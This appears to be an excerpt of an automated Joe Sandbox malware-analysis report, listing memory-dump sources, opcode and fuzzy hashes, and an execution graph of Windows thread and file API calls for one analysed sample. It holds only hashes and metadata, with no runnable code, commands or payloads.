                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a66000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4891387133cbabc66140f1f464fff733a42f66163e87295c5e88507815632e23
                                                          • Instruction ID: 274c33464af38b481c7a2c1c2f9949ddaf01d76102d4c6084341ad4de67fc6e6
                                                          • Opcode Fuzzy Hash: 4891387133cbabc66140f1f464fff733a42f66163e87295c5e88507815632e23
                                                          • Instruction Fuzzy Hash: 69F0907180D68DCFDF95EF18C8556D93BA0FF29340F0501A5E408C7152D7B5E8A4CB82
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A9A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a9a000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0bd79512f197a41a33659a22d599a2812230ee29214445697dedebe59391edaf
                                                          • Instruction ID: b444dc1dd5d0e23046e3090d7b606d92881237516e0f390bdc69c2978675bf51
                                                          • Opcode Fuzzy Hash: 0bd79512f197a41a33659a22d599a2812230ee29214445697dedebe59391edaf
                                                          • Instruction Fuzzy Hash: 33F01D30914A0D9FDF84EF54C445AAA7BF0FF68345F1004AAE40DD3250CB71A5A0CB81
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A66000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A66000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a66000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 782e0a1a927a5614a36caef7e596ea191d3b38d3ee86e5f201e7429c2d2e7152
                                                          • Instruction ID: e08ccc17ebc582c1186fdc436a075c23acd225755b14f7e4986417db2cfbd0c5
                                                          • Opcode Fuzzy Hash: 782e0a1a927a5614a36caef7e596ea191d3b38d3ee86e5f201e7429c2d2e7152
                                                          • Instruction Fuzzy Hash: 4EF0B43180D68DCFDB85EF18C8856DA3BE0FF29340F0501AAE448C7166D775D864CB82
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 655555e12ce483ae46b35a73302887e3fdc8bee4303c76261dc1b450d32c0dfe
                                                          • Instruction ID: 31f0f947479f8989d581cbaf281120dab8d1b75002ec714da950450e00c0f846
                                                          • Opcode Fuzzy Hash: 655555e12ce483ae46b35a73302887e3fdc8bee4303c76261dc1b450d32c0dfe
                                                          • Instruction Fuzzy Hash: F9F01D30814A4D9FEB90FF28C4496EA7BF0FF18305F400566E80CD3150DB34A190CB81
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A86000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a86000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8d491e09ab7ef52b279333a4fb0d9db9b438e8a246d1373e2f94cc79cfb391f
                                                          • Instruction ID: 298f45e15759507838ec01c5518effbd9ae64253fde77a1bad52ac93e910f20a
                                                          • Opcode Fuzzy Hash: e8d491e09ab7ef52b279333a4fb0d9db9b438e8a246d1373e2f94cc79cfb391f
                                                          • Instruction Fuzzy Hash: F4F09A7181E78C9FEB42EF2488192E83FB0FF1A200F4600E7E408C71A2DB349958C722
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c80f607ec5ddd6f31e256a05542f5b2167fa5c911f40e7c70ae3170e3df3728
                                                          • Instruction ID: 7a30b3a544febd8a368555382c249ff0e36c8caa23954444e61ab0e73bee2f3b
                                                          • Opcode Fuzzy Hash: 5c80f607ec5ddd6f31e256a05542f5b2167fa5c911f40e7c70ae3170e3df3728
                                                          • Instruction Fuzzy Hash: 54F03F7490895CCFDFA8EF98C894AACBBB1FB68301F21015D800EE7291CB31A881DF00
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a50000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4aeeb37482f1d89741d606f0b128387bc09e113cb156119eb2bf87cde75add3
                                                          • Instruction ID: a0f73ef41a0df2f16f14a6c1563202bae14aee573a2731fa1c098666bae2450d
                                                          • Opcode Fuzzy Hash: d4aeeb37482f1d89741d606f0b128387bc09e113cb156119eb2bf87cde75add3
                                                          • Instruction Fuzzy Hash: 9CF0963180A54A9FE725DB68C849BDCB7B1FF41354F1402F5C4185B056CA761D839F50
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A66000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A66000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a66000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9942e646e7d66675e1bd9b870bfab3457f67879f5ca76aaf449183575a5b8968
                                                          • Instruction ID: 0886d93087e43aa9b29dfc830cbdf116743c8699a68f349135a4a4beef555dfb
                                                          • Opcode Fuzzy Hash: 9942e646e7d66675e1bd9b870bfab3457f67879f5ca76aaf449183575a5b8968
                                                          • Instruction Fuzzy Hash: 29F08C71C1E6889FEB41EB6488892EC7FA0FF15340F0405A6E408C6051EB749588CB42
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849150000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c36536a577c032e4e1640c491c62958c3c1cfb08b12649be76bef886d8baf51a
                                                          • Instruction ID: 9f45e76eb6aae44e534b26103b3ac92c9b42e65f0fe3c492eac4824e19a89ef2
                                                          • Opcode Fuzzy Hash: c36536a577c032e4e1640c491c62958c3c1cfb08b12649be76bef886d8baf51a
                                                          • Instruction Fuzzy Hash: F8F0622290D6C28FEB62AF648C555A47BE0EF17364B1D0AFAC4848B193C66C3415D755
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849177000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849177000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849177000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                          • Instruction ID: acb61eb6f16b2672ed58806ded830513938d6a3b8be6602eb0d8da93a9e42865
                                                          • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                          • Instruction Fuzzy Hash: C4F0D47490A958DFCF55EBA8C85AE99BBB0FF68300F1401DDD00ADB262CA359845DF40
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
                                                          • Instruction ID: 5029d048a7dd1f743d29fe8bbe9b82e8832c0228f338a2f0c80598e0b5906400
                                                          • Opcode Fuzzy Hash: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
                                                          • Instruction Fuzzy Hash: 4FF02D3490895D8FDFA9EF48C850BA9B7B1EB69345F1041DA800EE7251CA31AA84CF10
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a50000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0b064ab6b71d3eebd63473b617f7a1f6e07af3fefc653dd532a9a6c0c3a2e32d
                                                          • Instruction ID: 3c93a23e0ce3d068ce919d4ad541fcc0d83e299a21fde2a8dc2cdc2fa3e0b5bc
                                                          • Opcode Fuzzy Hash: 0b064ab6b71d3eebd63473b617f7a1f6e07af3fefc653dd532a9a6c0c3a2e32d
                                                          • Instruction Fuzzy Hash: FCF06D70E0D55BCFE704EF64C8556BDB3B2FB51351F000639C015A7282CBB86A84CB96
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f7f14566ab0f762bca171457ef6c6ab5909bb11be8a1980cd47ecf9cfd42fc27
                                                          • Instruction ID: 5fd92c8f103a9d980de78860df8fcf8a09d77c970983134423fc0cdda7cebe24
                                                          • Opcode Fuzzy Hash: f7f14566ab0f762bca171457ef6c6ab5909bb11be8a1980cd47ecf9cfd42fc27
                                                          • Instruction Fuzzy Hash: BAF03A30A0820ACFEB55EF44C484BFE77F1EB55355F10463AC415D32A0DA78A9908B80
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A94000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A94000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a94000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d28724aa5c43eeec561c1d5e2ea37fbb65a329e03c500ef152ba0404d1324f60
                                                          • Instruction ID: 19d60cebf3f5374d1c667ca35806211f1efc21e2798fb876ef6b635083662194
                                                          • Opcode Fuzzy Hash: d28724aa5c43eeec561c1d5e2ea37fbb65a329e03c500ef152ba0404d1324f60
                                                          • Instruction Fuzzy Hash: 43E05231A2891D9FCFE4EF48D895AECB7B1FB58305F5044AA911DE3251DE30AA908F40
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A9A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a9a000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bedac6f684c60e1b5d29fb5e4b1ef2ea927c72380a3f80a5c8705e671a5e355c
                                                          • Instruction ID: 86b4e3d067b44ee7ff48009ed5b5a9aadb00babc92dc16267a2c7d2407a3a606
                                                          • Opcode Fuzzy Hash: bedac6f684c60e1b5d29fb5e4b1ef2ea927c72380a3f80a5c8705e671a5e355c
                                                          • Instruction Fuzzy Hash: E6E01A709085499FCF80EE94C48A89D7BB0EF21340F1444A5E518C7111D632D940CB91
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 16b534273e53b1bf534127624209fb8fce0cb814d38da2b827deb56d5dc2562a
                                                          • Instruction ID: 9a64a025e6140c63e9ce975671f67ca437bcdc929b8fb879792c5777c772cf25
                                                          • Opcode Fuzzy Hash: 16b534273e53b1bf534127624209fb8fce0cb814d38da2b827deb56d5dc2562a
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A86000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a86000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: &$I$m$v
                                                          • API String ID: 0-3742301045
                                                          • Opcode ID: 1f1f42b961e7ab586aed3f2fd699b4ebf85f13306209b41e58f25a4eb32efb9d
                                                          • Instruction ID: e5410e584dc3cda4da23da5a1fab1a3c91482b9a435a1f9f7e1107301826de0b
                                                          • Opcode Fuzzy Hash: 1f1f42b961e7ab586aed3f2fd699b4ebf85f13306209b41e58f25a4eb32efb9d
                                                          • Instruction Fuzzy Hash: 6B411770D0D62D8FEB94EB58C8857ECB6F1EB58395F1445B9C00DA7281CBB85A84CF19
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: G$`$b$r
                                                          • API String ID: 0-841970293
                                                          • Opcode ID: 5be175d9c921d439411e1d1e6ea35b446a656af9e4cca8cbe730b38e4c466cdc
                                                          • Instruction ID: e2209719b0b6dc119ed0a743a55e74b2bc9c519947a9badc0e57895cbcd660bb
                                                          • Opcode Fuzzy Hash: 5be175d9c921d439411e1d1e6ea35b446a656af9e4cca8cbe730b38e4c466cdc
                                                          • Instruction Fuzzy Hash: 4B310B70908669CFEB69EF08C885BB8B3F0FB54745F1041EAC04EA7291DB746A818F50

                                                          Execution Graph

                                                          Execution Coverage:5.3%
                                                          Dynamic/Decrypted Code Coverage:25%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:12
                                                          Total number of Limit Nodes:0
                                                          execution_graph 25971 7ff848bc09f5 25972 7ff848bc0a0f GetFileAttributesW 25971->25972 25974 7ff848bc0ad5 25972->25974 25963 7ff848bbecd9 25964 7ff848bbece7 CloseHandle 25963->25964 25966 7ff848bbedc4 25964->25966 25975 7ff848bbeb78 25976 7ff848bbebb3 ResumeThread 25975->25976 25978 7ff848bbec84 25976->25978 25967 7ff848bbd35d 25968 7ff848bbd36b SuspendThread 25967->25968 25970 7ff848bbd444 25968->25970

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2709195902.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff849350000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `<2I$`<2I
                                                          • API String ID: 0-3217421201
                                                          • Opcode ID: 39937b6f2235e5cea7dedef4d481bbf7a8f7fb1b2b90ab2a614ec5f63ef86556
                                                          • Instruction ID: 0b1ce1dc44451898f23cb4996bcd610823c9aa02c4a7a3678b98eb59edb38f95
                                                          • Opcode Fuzzy Hash: 39937b6f2235e5cea7dedef4d481bbf7a8f7fb1b2b90ab2a614ec5f63ef86556
                                                          • Instruction Fuzzy Hash: E1125670A1895D8FDFA8EF58C898FA9B7B1FB69305F1041A9D00EE7261DA359D81CF40

                                                          Control-flow Graph

                                                          control_flow_graph 315 7ff848bbeb78-7ff848bbebb1 316 7ff848bbebb3 315->316 317 7ff848bbebb4-7ff848bbec82 ResumeThread 315->317 316->317 321 7ff848bbec84 317->321 322 7ff848bbec8a-7ff848bbecd4 317->322 321->322
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2687866304.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848bb0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: f17f80eff171bf905ef0303bc4e6fd4a88414e4f2f2c36854fa2535c6784a42f
                                                          • Instruction ID: 008d127d1cfce58c0bcfd088826deba3a899d2f78c409df8583f131a01fdcfb8
                                                          • Opcode Fuzzy Hash: f17f80eff171bf905ef0303bc4e6fd4a88414e4f2f2c36854fa2535c6784a42f
                                                          • Instruction Fuzzy Hash: B5518B7090C78C8FDB55DFA8C895AE8BFF0EF56310F1441ABD049DB292DA359846CB11

                                                          Control-flow Graph

                                                          control_flow_graph 325 7ff848bbd35d-7ff848bbd369 326 7ff848bbd374-7ff848bbd442 SuspendThread 325->326 327 7ff848bbd36b-7ff848bbd373 325->327 331 7ff848bbd444 326->331 332 7ff848bbd44a-7ff848bbd494 326->332 327->326 331->332
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2687866304.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848bb0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: SuspendThread
                                                          • String ID:
                                                          • API String ID: 3178671153-0
                                                          • Opcode ID: 8013a6dab8552cd62356d4136aaac67af86d73cce73bbac7537abca6127436f1
                                                          • Instruction ID: 4deca85d24e1c2a5741fc7739606152374d96ec976e668271e23596470d76a77
                                                          • Opcode Fuzzy Hash: 8013a6dab8552cd62356d4136aaac67af86d73cce73bbac7537abca6127436f1
                                                          • Instruction Fuzzy Hash: D7414A70D0864D8FDB98EFA8D885AEDBBF0EB5A310F10416AD049E7252DA34A845CB45

                                                          Control-flow Graph

                                                          control_flow_graph 335 7ff848bc09f5-7ff848bc0ad3 GetFileAttributesW 339 7ff848bc0ad5 335->339 340 7ff848bc0adb-7ff848bc0b19 335->340 339->340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2687866304.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848bb0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2709195902.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff849350000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `<2I
                                                          • API String ID: 0-3580074414

                                                          Control-flow Graph

                                                          control_flow_graph 515 7ff848bbecd9-7ff848bbece5 516 7ff848bbecf0-7ff848bbedc2 CloseHandle 515->516 517 7ff848bbece7-7ff848bbecef 515->517 521 7ff848bbedc4 516->521 522 7ff848bbedca-7ff848bbee1e 516->522 517->516 521->522
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2687866304.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848bb0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2709195902.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff849350000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 92d970224cb9e21856c6084d49793622ae245ee12d78add3d982d0eb966bf867
                                                          • Instruction ID: e7221b3148ff77705e3cf4aab9200944edcedbda22a153ca51048cdfd0cb6b13
                                                          • Opcode Fuzzy Hash: 92d970224cb9e21856c6084d49793622ae245ee12d78add3d982d0eb966bf867
                                                          • Instruction Fuzzy Hash: 41F01D7090894D9FDF84EF58C448AAABBF0FF68305F5040AAE40DD3150DB31A9A0CB80
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 10fdd75375f0c5e8b87e8de67520c83053133c3a794a2a45f35f930b2bec326f
                                                          • Instruction ID: 271763e6b83d9078bdf8d679112e6053a4721e767c276ba5df9271beb9b3d470
                                                          • Opcode Fuzzy Hash: 10fdd75375f0c5e8b87e8de67520c83053133c3a794a2a45f35f930b2bec326f
                                                          • Instruction Fuzzy Hash: A2F0303090991E9FEB50FF18D44A6ED77A0FF58345F500437E81CD2190DBB4A5A0C795
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c6a19abe3f7ec190be493f6cc90b9e9e5027479b8917dc5f7f084504434aa4c
                                                          • Instruction ID: 4b41ba0a5c549abb3bacefb7db890edcb8d9fa53d9925087ef79656588aecb50
                                                          • Opcode Fuzzy Hash: 5c6a19abe3f7ec190be493f6cc90b9e9e5027479b8917dc5f7f084504434aa4c
                                                          • Instruction Fuzzy Hash: 40F0903090A24A9FE765DB6CC809BDCB7B5FF41350F2802F9C4089B156CA762D878F90
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 376005560a9e0d4689313639a28a3a3d2b0903f3b22d84ba52c923b8d985fecc
                                                          • Instruction ID: bbb378f3bc0c3a411eab0a8a7804a564e8df9cd7653fc8f295c12b1a3bf6e9a4
                                                          • Opcode Fuzzy Hash: 376005560a9e0d4689313639a28a3a3d2b0903f3b22d84ba52c923b8d985fecc
                                                          • Instruction Fuzzy Hash: 4AF01C7081994E9FEB94FF68C84A6EA7BE0FF18345F404476E80CD2290DB74A5A0CB95
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3136e5f34da7aaa586e713bd641aeb43b3d6eca847d1049ec5a22c8af5b4e1d1
                                                          • Instruction ID: c3608b84a7dff7df50290589f85a51b969fe75a9c52b531273b22fe0ad3c2d17
                                                          • Opcode Fuzzy Hash: 3136e5f34da7aaa586e713bd641aeb43b3d6eca847d1049ec5a22c8af5b4e1d1
                                                          • Instruction Fuzzy Hash: E1F0F230808A0E8FDB94EF18C845AAA37A0FF28390F000165F41DC3250C774E9A0DB92
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 186d37211c6e633f154893fad1498d8b383cdac876d6fec72d682f39caee7271
                                                          • Instruction ID: afad39dba0eb3fbec108aa0d674840adcf953f3956e08ddf052c1be0656efc17
                                                          • Opcode Fuzzy Hash: 186d37211c6e633f154893fad1498d8b383cdac876d6fec72d682f39caee7271
                                                          • Instruction Fuzzy Hash: 31F01C31929A4DAEEB54FF7894496EE7BA0FF05305F4004BAE80DC2291DB35A194CB41
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 283a96d1de31a716915839b6b2c82e08be1b223c30a26cef291f87fa66a6ab75
                                                          • Instruction ID: 2195827a0774a7380004484646a8464dbb0a2e91e8e04f62fd32aa790a7da5fb
                                                          • Opcode Fuzzy Hash: 283a96d1de31a716915839b6b2c82e08be1b223c30a26cef291f87fa66a6ab75
                                                          • Instruction Fuzzy Hash: 85F04930A0E56ACEE704EB64C8552BDB7A1FB50351F040A39C015A7282CBB86A448B96
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2673288042.00007FF848A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_7ff848a10000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7fdb57992658f85ec9330d1df0a81e5f39f8f773c57ae5463471d2228a9fe41b
                                                          • Instruction ID: 383ad3c0d28b674ed13a7ad4f4d37ce14af09006165a423f2978626bf7a4e695
                                                          • Opcode Fuzzy Hash: 7fdb57992658f85ec9330d1df0a81e5f39f8f773c57ae5463471d2228a9fe41b
                                                          • Instruction Fuzzy Hash: FFF0ED31829A4DAFEB54FF6889496EEB7E0FF04305F5004BAE81DD2290DB35A194CB52